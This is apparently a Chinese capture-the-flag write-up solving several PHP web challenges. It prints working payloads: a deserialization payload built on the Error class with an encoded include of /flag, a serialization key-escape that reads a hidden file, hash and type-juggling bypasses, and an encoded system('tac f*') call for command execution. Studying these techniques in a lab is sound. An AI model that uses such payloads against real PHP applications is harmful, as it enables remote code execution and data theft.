web 02
1.要满足syc和lover的值不相等且syc的md5与sha1值和lover的md5与sha1值相等
2.对syc的值进行了过滤
3.参数名的绕过
4.反序列化
要绕过MD5和sha1检测可以用Error类
在Error类中有__tostring方法,当类被当成字符串处理时,就会调用这个函数,md5()和sha1()函数都会调用__tostring()。
我们可以将题目代码中的 $syc 和 $lover 分别声明为类似以下代码中内置类的对象,让这两个对象本身不同(传入错误代码),但是 __toString 方法输出的结果相同即可。
$a = new Error("payload",1);
$b = new Error("payload",2);
由于题目用preg_match过滤了小括号无法调用函数,所以我们尝试直接 include “/flag” 将flag包含进来即可;由于过滤了引号,我们直接用url取反绕过即可
<?php
class SYCLOVER {
public $syc;
public $lover;
public function __wakeup(){
if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
eval($this->syc);
} else {
die("Try Hard !!");
}
}
}
}
$str = "?><?=include~".urldecode("%D0%99%93%9E%98")."?>";
//这里添加?>是为了与前面的error报错信息进行闭合以便于执行payload
/*
或使用[~(取反)][!%FF]的形式,
即: $str = "?><?=include[~".urldecode("%D0%99%93%9E%98")."][!.urldecode("%FF")."]?>";
$str = "?><?=include $_GET[_]?>";
*/
$a=new Error($str,1);$b=new Error($str,2); //注意这里定义的时候要写在同一行否则可能会有换行错误信息
$c = new SYCLOVER();
$c->syc = $a;
$c->lover = $b;
echo(urlencode(serialize($c)));
?>
执行后得到
输入payload得到flag
web 03
<?php
//flag in fl0gd.php
error_reporting(0);
highlight_file(__FILE__);
$yutu = $_GET['y'];
function rongyao($a){
return preg_replace('/php|phtml|flag|/i','',$a); //利用过滤的内容进行键逃逸
}
if($_COOKIE){
unset($_COOKIE);
}
$_ABC["xiaqing"] = 'xiaqing';
$_ABC["qjj"]=$yutu;
extract($_POST); //内容重置,可以通过添加新的键来进行构造
if(!$_GET['photo']){
$_ABC['photo'] = base64_encode('photo.png'); //通过POST进行传输
}else{
$_ABC['photo'] = md5(base64_encode($_GET['photo']));
}
$serialize = rongyao(serialize($_ABC));
if($yutu=='qiaojingjing'){
echo 'you are my rongyao~~';
}else if($yutu=='show_photo'){
$phpinfo = unserialize($serialize);
echo file_get_contents(base64_decode($phpinfo['photo']));//打开文件获取文件内容
}
通过利用键逃逸使得参数photo的值为文件名
构造payload
$_ABC[flagphp]=s:1:"1";s:5:"photo";s:12:"ZmwwZ2QucGhw";}
经过序列化之后变成
"a:2:{s:7:"phpflag";s:42:";s:1:"1";s:5:"photo";s:12:"ZmwwZ2QucGhw";}";s:5:"photo";s:12:"cGhvdG8ucG5n";}"
当经过过滤之后就会变成
"a:2:{s:7:"";s:42:";s:1:"1";s:5:"photo";s:12:"ZmwwZ2QucGhw";}";s:5:"photo";s:12:"cGhvdG8ucG5n";}"
" ";s:42: "=>1
" photo "=>ZmwwZ2QucGhw
所以payload:
get:?y=show_photo
post:$_ABC[flagphp]=s:1:"1";s:5:"photo";s:12:"ZmwwZ2QucGhw";}
web 05
<?php
highlight_file(__FILE__);
error_reporting(0);
require __DIR__.'/lib.php';
if(isset($_GET['time'])){
if(!is_numeric($_GET['time'])){ //判断输入的是否是数字
echo 'The time must be number.';
}else if($_GET['time'] < 60 * 60 * 24 * 30 * 2){
echo 'This time is too short.';
}else if($_GET['time'] > 60 * 60 * 24 * 30 * 3){
echo 'This time is too long.';
}else{
sleep((int)$_GET['time']); //将字符型数字转为数字型数字
echo $flag1;
}
echo '<hr>';
}
?>
我们需要绕过sleep这个函数使其不能对所输入的数字进行识别,达到无延迟的目的
字符型数字支持普通数字型、科学记数法型、部分支持十六进制0x型;
数字型数字不支持科学记数法型(部分)、支持十六进制0x型
所以我们可以通过科学记数法或者十六进制进行绕过
60 * 60 * 24 * 30 * 2
的值为5184000
payload:?time=5.184001e6 / ?time=0x4F1A01
获取了一半flag
之后通过查看robots.txt可以得到part.txt、part.php
我们可以在part.txt查看源代码,在part.php页面中进行传参
只需要通过post传参,使flag=flag即可(看了看大家的wp,这里的flag值不做要求???)
web 06
虽然但是,我是在玩了两局之后幡然醒悟哦应该不是要玩通关。。。
查看源代码发现了很多js文件,打开"main2048.js"这个文件后可以看到有隐藏的php文件
我们可以通过数组的方式来绕过sha1,通过0=xxxxxxx的形式来绕过json_decode()
payload:?a[]=1&b[]=2&key={“key”:0}
剩下的一半还在这个js文件中是一串密码
对这串字符进行解密 附上网站:http://www.jsfuck.com/
得到另一半flag
web 07
最先出来一个phpinfo的页面
在robot.txt中可以看到有?use1,在url中输入
得到源码
在PHP中,数字可以和命令进行一些运算。比如说1-phpinfo()-1
输出的还是phpinfo()
所以我们可以通过1-system('tac f*')-1
这样的形式进行flag读取
因为正则匹配非数字字母下划线的字符,所以我们可以通过异或或是取反都可以
这里用了取反
paylaod:?use=1&v2=1&v3=-(~%8C%86%8C%8B%9A%92)(~%8B%9E%9C%DF%99%D5)-